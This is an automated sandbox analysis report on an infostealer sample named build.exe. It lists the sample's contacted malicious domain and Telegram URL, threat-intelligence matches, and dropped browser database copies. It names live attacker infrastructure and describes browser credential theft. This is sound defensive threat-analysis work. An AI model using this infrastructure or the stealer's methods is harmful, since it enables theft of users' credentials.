https://marka4.cyouW	build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://marka4.cyou/e	build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://marka4.cyouS	build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/no111pjs4tnMozilla/5.0	build.exe	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	false		high
https://marka4.cyou/p	build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://marka4.cyou/l	build.exe, 00000000.00000003.1754063208.0000000000638000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	build.exe, 00000000.00000002.2069404351.0000000003013000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
https://marka4.cyou/b	build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://clients6.google.com	chromecache_64.3.dr	false		high
https://marka4.cyou/_	build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://marka4.cyou/ou	build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.196	www.google.com	United States	15169	GOOGLEUS	false
116.203.166.124	marka4.cyou	Germany	24940	HETZNER-ASDE	true
142.250.185.238	play.google.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.142	plus.l.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589233
Start date and time:	2025-01-11 22:59:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	build.exe
Detection:	MAL
Classification:	mal100.troj.spyw.winEXE@22/24@8/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 115 Number of non-executed functions: 123
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 172.217.16.206, 66.102.1.84, 142.250.181.238, 142.250.186.78, 142.250.186.67, 142.250.184.234, 172.217.18.10, 142.250.185.234, 142.250.185.202, 216.58.206.42, 172.217.16.138, 142.250.74.202, 142.250.184.202, 172.217.16.202, 142.250.185.74, 142.250.186.138, 142.250.185.106, 142.250.181.234, 142.250.186.170, 142.250.186.106, 142.250.185.170, 216.58.206.46, 199.232.210.172, 192.229.221.95, 2.23.242.162, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, clients.l.google.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	https://url.us.m.mimecastprotect.com/s/si15COYvJJSRLD3svhDSGbOPs?domain=ejfv5thbb.cc.rs6.net	Get hash	malicious	Unknown	Browse
	https://url.us.m.mimecastprotect.com/s/si15COYvJJSRLD3svhDSGbOPs?domain=ejfv5thbb.cc.rs6.net	Get hash	malicious	Unknown	Browse
	https://docs.zoom.us/doc/NGIyJXAkRDK0sAtAUh4DFw?from=email	Get hash	malicious	Unknown	Browse
	https://ezdrivema.com-payowa.top/i	Get hash	malicious	Unknown	Browse
	https://app.heractivatie-portal.net/	Get hash	malicious	Unknown	Browse
	https://ville-tonnerre.com/CR_CM/config/information.php?access.x61307366953&&data.x=en_3abae6f9aa37b42f5c9bf622c	Get hash	malicious	Unknown	Browse
	http://fast.kiwipsum.com/	Get hash	malicious	Unknown	Browse
	4kN17cL4Tn.exe	Get hash	malicious	LummaC	Browse
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse
	Yv24LkKBY6.exe	Get hash	malicious	Unknown	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	DyM4yXX.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	5dFLJyS86S.ps1	Get hash	malicious	Unknown	Browse	149.154.167.99
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	46.105.202.207
	http://t.me/hhackplus	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://sendbot.me/mousse-w0fysl7	Get hash	malicious	Unknown	Browse	104.26.12.222
	ZT0KQ1PC.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse	149.154.167.220
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
HETZNER-ASDE	80P.exe	Get hash	malicious	I2PRAT	Browse	135.181.93.228
	5.elf	Get hash	malicious	Unknown	Browse	135.181.142.143
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	138.201.222.163
	4p5XLVXJnq.exe	Get hash	malicious	FormBook	Browse	136.243.225.5
	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	136.243.225.5
	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	88.198.8.150
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	88.198.8.150
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	144.76.229.203
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	78.47.94.125
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	136.243.64.147

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	zmpZMfK1b4.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	116.203.166.124 149.154.167.99
	ix8kxoBHDb.exe	Get hash	malicious	Remcos, GuLoader	Browse	116.203.166.124 149.154.167.99
	b0cQukXPAl.exe	Get hash	malicious	LummaC	Browse	116.203.166.124 149.154.167.99
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	116.203.166.124 149.154.167.99
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	116.203.166.124 149.154.167.99
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	116.203.166.124 149.154.167.99
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	116.203.166.124 149.154.167.99
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	116.203.166.124 149.154.167.99
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	116.203.166.124 149.154.167.99
	AM983ebb5F.exe	Get hash	malicious	GuLoader	Browse	116.203.166.124 149.154.167.99

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2dba1\89hl6xba1

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2dba1\8gdtjm

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2dba1\c2vkng

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2dba1\gdba16

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2dba1\k6xt0zusr

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2dba1\opz5fu

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\2dba1\phdj5f

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2dba1\pph47y

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\Desktop\build.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.383980356322614
Encrypted:	false
SSDEEP:	48:SfNaoCUNETECUwfNaoCctDCc6/fNaoCNvC7fNaoCJ70UrU0U8CE:6NnCUNETECU8NnCwCFNnCNvCTNnCJ706
MD5:	4F04795D828B1B9F673808522B77DC9D
SHA1:	0F819F01AB8F0901DBD5BCDA82261EB924FFA4E2
SHA-256:	A2C25298E3FADC2B19CC3E91CDD3BE8E84069BEBEEE9CA3E98F28E3057DD71C0
SHA-512:	DB1F76818DCBC3F28288DB9331CBBE2330EE53FD08CAACDF3CF41EFC642FBE842D4C3ED95BF63EB4DEF2FEEF9B320EAE8E54A7B0D09544588C712DE6249D7E0C
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/AC8DB5421CB6B3EBB32E4D2A4C2C9674",.. "id": "AC8DB5421CB6B3EBB32E4D2A4C2C9674",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/AC8DB5421CB6B3EBB32E4D2A4C2C9674"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6AFCDBB7A54B0068825B3A0991FB7523",.. "id": "6AFCDBB7A54B0068825B3A0991FB7523",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6AFCDBB7A54B0068825B3A0991FB7523"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3323)
Category:	downloaded
Size (bytes):	3328
Entropy (8bit):	5.848917600518732
Encrypted:	false
SSDEEP:	96:VualikFd66666393uc5U1pKsJgn9by8OffQffo:VFdFd6666639k11un9g
MD5:	5005A3D25F595FED0797BB9A62DB5DAF
SHA1:	4E65408CBBBACB46209D0DB862330281098CC261
SHA-256:	53FC09955F959DEF18EC72264C34B4470C1315CE6113B1BBCC9362FB427EF16F
SHA-512:	040FB79A2ACD4E2B27D4FF5A31C3E8EC5FE7387239B1183C7873FDDE5DF50D63A479524C2E5DF867609D62B2357F4F19FFA11D2F9B3701569F3557AB82E5B315
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["tesla model y juniper","rockstar games gta 6 release date","la strong shirts","dinosaur","final jeopardy today","irs tax returns","gordon brothers big lots","nashville weather snow forecast"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wMjl0eBIIUmVwdGlsZXMy/w1kYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUMwQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0F3RUJBUUFBQUFBQUFBQUFBQUFFQlFNR0J3RUNBUC9FQURBUUFBSUJBZ1VDQlFRQUJ3RUFBQUFBQUFFQ0F3UVJBQVVTSVRFVFVRWVVRV0Z4SWpLQmtSVXpORUppb2ZBai84UUFGd0VCQVFFQkFBQUFBQUFBQUFBQUFBQUFBUUlBQS8vRUFCNFJBQUlDQWdJ

Chrome Cache Entry: 61

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2410)
Category:	downloaded
Size (bytes):	176106
Entropy (8bit):	5.550039490877255
Encrypted:	false
SSDEEP:	3072:eEBOdc32TMLUtSdEsN4FP5/278Ivoh9NmxVhTaLB80G5JCk2mlNwfQuJq+CjQDI/:eKOdcPLUtSdn4P5/y8Iwh9NmX5aLB80o
MD5:	D64C0D9594ACD5B48E6C6A4A48494A2C
SHA1:	F39C02870860A3F0563B47D753699E8095578DFE
SHA-256:	A2E707230996D82F27A3EC406290353D4DF89A967693D454A57E14896509D87B
SHA-512:	F6DA048855D3B2D05F0A11E90206209FF991EEEA1926A298B17D1DE48E85E1E2334CF7885C772AB109FCC372FB5B6DA8A328AC901653C87CDAFC3B0A9607D3C4
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvH0Rknr6hXqx-tgqAUuIv05wLZhQ"
